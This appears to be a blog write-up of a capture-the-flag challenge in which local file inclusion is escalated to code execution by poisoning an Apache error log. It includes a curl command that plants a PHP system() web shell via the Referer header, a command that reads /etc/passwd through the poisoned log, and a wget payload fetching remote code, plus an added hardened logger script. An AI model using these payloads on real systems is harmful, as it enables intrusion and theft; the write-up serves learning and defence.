Spawning a Shell by LFI Poisoning Log Files

Welcome Padawan!
A while ago, a friend sent me a link to a challenge. I found one of the pages vulnerable to SQL injection, injected it, extracted the admin’s credentials, and as soon as I logged in to the “Admin Panel”, I found a page vulnerable to LFI.
So .. I tried /proc/self/environ, finding a phpinfo() page, data://, php://input and things like that but they weren’t working/there. 🙁 ..

The only thing I didn’t try was LFI log file poisoning, but it was time to unchain the beast ..
I included the “Apache HTTP Configuration file” and looked for the error/access log. Interestingly, instead of finding a .log file, I found a piped bash script ..

Me likey 🙂 .. Then, of course, I included the bash script. — These were its contents ..

#!/bin/bash

DATE=`date +%Y-%m-%d`

while : ; do
    read line
    [ -z "$line" ] && exit

    DOMAIN=""
    if [[ "$line" =~ \[host:([^\]]+) ]]; then
        DOMAIN=${BASH_REMATCH[1]}
    fi

    if [ -n "$DOMAIN" ]; then
        echo "${line//\[host:${DOMAIN}\] /}" >> "/var/www/html/$DOMAIN/logs/error_${DATE}.log"
        chown apache:apache /var/www/html/$DOMAIN/logs/error_${DATE}.log
    else
        echo "${line}" >> /var/www/html/error_${DATE}.log
        chown apache:apache /var/www/html/error_${DATE}.log
    fi
done

What does this do? It creates a .log file in “/var/www/html/domain.tld/logs/” with the name “error_YYYY-MM-DD”, and according to the Apache config, it sent the URL, Referer and time to this bash script, which then saved them to the file .. So, I just had to visit a non-existent page *to get a 404* with my referer set to "<?php system('wget http://x.com/y.txt -O z.php'); ?>" or any of its equivalents .. and then include the .log file to execute the code 😉

curl -e "<?php system($_POST['x']) ?>" http://domain.tld/blablabla.ext

curl --data "x=cat /etc/passwd" http://domain.tld/admin/lfi.php?param=../../../../../../../../var/www/html/domain.tld/logs/error_YYYY-MM-DD.log
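
Seen from the defender's side, the piped logger is what turns the LFI into code execution: it writes an unvalidated host name and a raw Referer into an apache-owned file under the document root. The hardened logger below is an added example, not part of the original post or the challenge; it keeps logs outside the web root, accepts only plain DNS names as directory names, and percent-encodes angle brackets. `LOG_ROOT`, the `_default` bucket, the `--run` switch and the pre-created per-vhost directories are assumptions.

```shell
#!/bin/sh
# Added example: hardened replacement for the piped error logger shown above.
# Assumptions (not from the original page): LOG_ROOT, the "_default" bucket,
# the "--run" switch and per-vhost directories pre-created by an admin.

LOG_ROOT="${LOG_ROOT:-/var/log/httpd/vhosts}"   # outside the document root

# Print the vhost named in a "[host:NAME]" tag, or "_default" when the tag is
# missing or NAME is not a plain DNS name (rejects "/", "..", leading dots).
extract_host() {
    host=$(printf '%s\n' "$1" | sed -n 's/.*\[host:\([^]]*\)\].*/\1/p')
    case "$host" in
        ''|.*|*..*|*[!A-Za-z0-9.-]*) echo "_default" ;;
        *) echo "$host" ;;
    esac
}

# Percent-encode angle brackets so a logged Referer or URL can never contain
# a "<?php" opening tag, whatever later reads the file.
sanitize_line() {
    printf '%s\n' "$1" | sed -e 's/</%3C/g' -e 's/>/%3E/g'
}

# Append one sanitized line to LOG_ROOT/<vhost>/error_<date>.log. Only
# directories that already exist are used; anything else goes to _default.
log_line() {    # $1 = raw line from Apache, $2 = date stamp
    dir="$LOG_ROOT/$(extract_host "$1")"
    [ -d "$dir" ] || dir="$LOG_ROOT/_default"
    mkdir -p "$LOG_ROOT/_default"
    sanitize_line "$1" >> "$dir/error_$2.log"
}

main() {
    umask 027                       # no world-readable logs, no chown to apache
    stamp=$(date +%Y-%m-%d)
    while IFS= read -r line; do
        [ -n "$line" ] && log_line "$line" "$stamp"
    done
    return 0
}

# Only read stdin when started as a logger, e.g. from a piped ErrorLog.
if [ "${1:-}" = "--run" ]; then main; fi
```

The logger is only one layer: the include parameter in lfi.php still needs to be restricted to a fixed set of files.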

I guess we’re done here 😀

ps: after solving the challenge I found out the “official solution” was nothing like this, it was a simple imagecreatefromXYZ() bypass. 😛
You had to upload an image-encoded shell to successfully bypass that function + other image re-sizing functions .. There are various great articles written on that topic; here are some of them ..

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My areas of expertise include Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more...

4 thoughts on “Spawning a Shell by LFI Poisoning Log Files”

  1. If this all works as you explained, you are a genius! I wish I had more of a programming brain. How did you learn?